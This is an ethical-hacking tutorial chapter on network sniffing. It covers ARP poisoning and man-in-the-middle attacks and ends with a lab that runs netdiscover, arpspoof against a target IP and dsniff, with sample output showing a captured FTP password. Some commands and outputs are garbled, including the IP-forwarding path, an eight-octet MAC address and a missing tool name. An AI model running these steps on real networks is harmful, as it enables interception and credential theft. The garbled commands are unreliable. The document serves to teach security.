Venom Academy/Ethical Hacking/Sniffing

Now in this chapter we will look into sniffing. Sniffing can be defined as a method of harvesting data by capturing packets across a network either wired or wireless. The main goal in sniffing is to capture unencrypted communication. Lets look into it a bit more in detail

Types of sniffing
Sniffing is basically divided into two categories, they will be explained below:


 * Active Sniffing
 * Passive Sniffing

Active Sniffing
Active sniffing happens when the attacker directly interacts with the victim machine by sending packet requests and listening for responses. Some examples may include ARP spoofing and Man in the middle attacks.

Passive sniffing
Passive sniffing happens when the attack does not directly interact with the target machine, This only happens when the attacker sniffs for packets only without performing an attacks.

Promiscuous and nonpromiscuous mode
Before any sniffing can be done on a network, you first need to understand the differences between promiscuous and nonpromiscuous mode in this case they are associated with network cards. By default your network card is set to nonpromiscuous mode, which means that the machine will only receive packets that are only mentioned for you. In promiscuous mode, the network card will forcefully allow us to capture all the traffic that is not intended for our computer.

Man in the Middle attack(MITM)
The main goal of a MITM attack is that the attacker can place himself in the middle of a communication between two machines. For example someone logging into Facebook, if we are using MITM attacker will place ourself between the victim and the Facebook server. Therefore all communications can be captured by the attacker.

ARP Poisoning
ARP Poisoning is the most popular attack used to intercept a communication between two machines. This is achieved by sending fake ARP replies to both the possible target and server. The way it works is that the attacker would send a fake ARP reply to any computer on the network to make the computer believe that the IP of the attacker is associated with a certain address. Therefore the computer becomes confused and might send the packets to the attacker thinking that it is the legitimate server.

Lab exercise
Before we get to perform a MITM attack, we first need to enable IP forwardings that the traffic can be forwarded to its intended destination. To do this use the following command: root@venom [$]~ echo 1 > proc ipfoward Now that we have enabled IP forwarding, we need to gather information to perform a MITM attack the required information are:


 * 1) The attackers IP address
 * 2) The Victims IP address
 * 3) The default gateway values

To find your IP you can use the ifconfig command. Then to find the victim's IP we can use the following command: netdiscover Netdiscover will list all the machines in the Network, all you need to do is copy the IP address of the victim. The default gateway will also be shown on netdiscover. Now to perform a MITM attack we first need to perform a ARP Poisoning attack using arpspoof the command syntax is shown below: arpspoof -i  -t Here we will show you an example and its output. root@venom [$]~ arpspoof -i eth0 -t 192.168.75.142 192.168.75.2 0a:12:18:1a:2b:16:32:8c 0806 ARP reply 192.168.75.2 is-at 0a:12:18:1a:2b:16:32:8c As we can see above our ARP spoof attack is working brilliantly. Now we need to send all the traffic that we are receiving to a tool called . Now execute the command below dsniff Here in our example, dsniff returned with the output shown below: root@venom [$]~ dsniff dsniff: listening on eth0 --- 07/23/13/ 07:14:20 tcp 192.168.75.142 -> venom.machines.com 21 (ftp) USER anonymous PASS IFuser As shown in our example, dsniff managed to return back with passwords that were harvested during the MITM attack

Please know that there are many tools to use for sniffing, at around with them, we can't mention them all here.

Promiscuous and nonpromiscuous